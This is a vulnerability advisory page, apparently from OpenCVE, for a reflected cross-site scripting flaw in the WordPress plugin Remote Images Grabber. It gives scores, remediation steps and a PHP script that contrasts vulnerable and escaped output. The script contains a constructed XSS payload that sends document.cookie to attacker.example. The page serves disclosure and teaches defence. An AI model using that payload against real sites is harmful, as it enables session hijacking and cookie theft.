Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber remote-images-grabber allows Reflected XSS. This issue affects Remote Images Grabber: from n/a through <= 0.6.
Published: 2025-05-19
Score: 7.1 High
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The Remote Images Grabber plugin writes attacker-controlled request input into the HTML it generates without escaping it (CWE-79), so an attacker can inject script into the page served to a visitor. Because the injected JavaScript runs in the origin of the WordPress site, it can do whatever the visitor's browser is allowed to do there: hijack the session, capture credentials entered on the page, or issue requests on the victim's behalf.

Affected Systems

The flaw affects the WordPress plugin Remote Images Grabber (slug remote-images-grabber) published by andreyk. Every release up to and including 0.6 is affected; the CVE record gives no earliest affected version (listed as n/a), so treat all versions through 0.6 as vulnerable.

Risk and Exploitability

The CVSS 3.1 base score of 7.1 (High) comes from the vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L: the flaw is reachable over the network with no privileges and low complexity, but it requires user interaction, and the scope is changed because the script executes in the site's origin rather than within the plugin itself. The EPSS score below 1% and the SSVC assessment (Exploitation: none, Automatable: no) indicate that exploitation in the wild is currently unlikely, and the vulnerability is not listed in the CISA KEV catalog. The likely exploit is a crafted URL whose query parameters the plugin reflects verbatim into the response; the attacker must get a victim, ideally a logged-in user, to open that link, for example through phishing or a link planted on another site, before the script executes.

Generated by OpenCVE AI on April 30, 2026 at 19:36 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Update Remote Images Grabber to a release newer than 0.6 once the vendor publishes one that removes the XSS flaw (no fixed version is listed on this page yet)
  • Until then, disable the plugin entirely; deleting it as well removes the vulnerable files from the web root
  • Apply a Content Security Policy that refuses inline and untrusted-origin scripts; deploy it in report-only mode first, since WordPress themes and plugins rely heavily on inline scripts, and treat it as a mitigation that limits the impact of the XSS rather than a fix for it
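
As an added illustration, not code from the Remote Images Grabber plugin (this page does not reproduce its source), the following plain-PHP script puts the reflected pattern described under Impact beside the escaping and CSP measures recommended above. The parameter name q, the payload and the host attacker.example are constructed; the WordPress helpers that would replace the plain-PHP calls in real plugin code are named in the comments.

```php
<?php
// Added example, not code from the Remote Images Grabber plugin. It contrasts
// the generic reflected-XSS pattern the advisory describes with the hardened
// form, in plain PHP so it runs from the command line (php demo.php).
// The parameter name 'q', the payload and attacker.example are constructed.

declare(strict_types=1);

// VULNERABLE: the request value is concatenated straight into the HTML.
// Whatever the attacker placed in the URL becomes markup, including <script>.
function render_vulnerable(string $q): string
{
    return '<p>Grabbing images matching: ' . $q . '</p>';
}

// HARDENED: escape at output time for the exact context the value lands in.
// htmlspecialchars() with ENT_QUOTES is what WordPress's esc_html() and
// esc_attr() build on; in plugin code call those instead, after running
// wp_unslash() and sanitize_text_field() on the raw $_GET value.
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_safe(string $q): string
{
    return '<p>Grabbing images matching: ' . esc($q) . '</p>'
         . '<input type="text" name="q" value="' . esc($q) . '">';
}

// Defense in depth, as in the CSP recommendation above: a per-response nonce
// lets the site's own inline scripts run, while an injected <script> block,
// which cannot know the nonce, is refused by the browser. Ship it as
// Content-Security-Policy-Report-Only first: WordPress themes and plugins
// lean heavily on inline scripts and a strict policy will break some of them.
function csp_header(string $nonce, bool $reportOnly = true): string
{
    $name = $reportOnly ? 'Content-Security-Policy-Report-Only' : 'Content-Security-Policy';
    return $name . ": script-src 'self' 'nonce-" . $nonce . "'; object-src 'none'; base-uri 'self'";
}

// Constructed payload: breaks out of the surrounding markup and injects script
// that exfiltrates the visitor's cookies to an attacker-controlled host.
$payload = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script>';

echo "vulnerable:\n" . render_vulnerable($payload) . "\n\n";
echo "hardened:\n" . render_safe($payload) . "\n\n";

// In WordPress the header would be sent from the send_headers action:
// add_action('send_headers', function () use ($nonce) { header(csp_header($nonce)); });
$nonce = base64_encode(random_bytes(16));
echo csp_header($nonce) . "\n";
```

The vulnerable output contains the attacker's `<script>` tag verbatim; the hardened output renders the same bytes as harmless text (`&quot;&gt;&lt;script&gt;...`) in both the text and attribute contexts. The CSP header only reduces what an injected script can do if one still slips through; it is not a substitute for escaping.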


Advisories
Source: EUVD
ID: EUVD-2025-15754
Title: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS. This issue affects Remote Images Grabber: from n/a through 0.6.
History

Thu, 23 Apr 2026 15:00:00 +0000

Type: Metrics (cvssV3_1)
Value: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Wed, 01 Apr 2026 23:45:00 +0000

Type: Description
Value removed: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS. This issue affects Remote Images Grabber: from n/a through 0.6.
Value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber remote-images-grabber allows Reflected XSS. This issue affects Remote Images Grabber: from n/a through <= 0.6.
Type: References
Type: Metrics (cvssV3_1)
Value: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Mon, 19 May 2025 22:15:00 +0000

Type: Metrics (ssvc)
Value: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}


Mon, 19 May 2025 19:00:00 +0000

Type: Description
Value added: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in andreyk Remote Images Grabber allows Reflected XSS. This issue affects Remote Images Grabber: from n/a through 0.6.
Type: Title
Value added: WordPress Remote Images Grabber plugin <= 0.6 - Reflected Cross Site Scripting (XSS) vulnerability
Type: Weaknesses
Value added: CWE-79
Type: References
Type: Metrics (cvssV3_1)
Value added: {'score': 7.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L'}


Subscriptions

Wordpress
MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T16:12:35.929Z

Reserved: 2025-04-17T17:03:58.444Z

Link: CVE-2025-43832

Vulnrichment

Updated: 2025-05-19T21:14:30.143Z

NVD

Status: Deferred

Published: 2025-05-19T19:15:50.560

Modified: 2026-04-23T15:29:52.840

Link: CVE-2025-43832

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-30T19:45:26Z

Weaknesses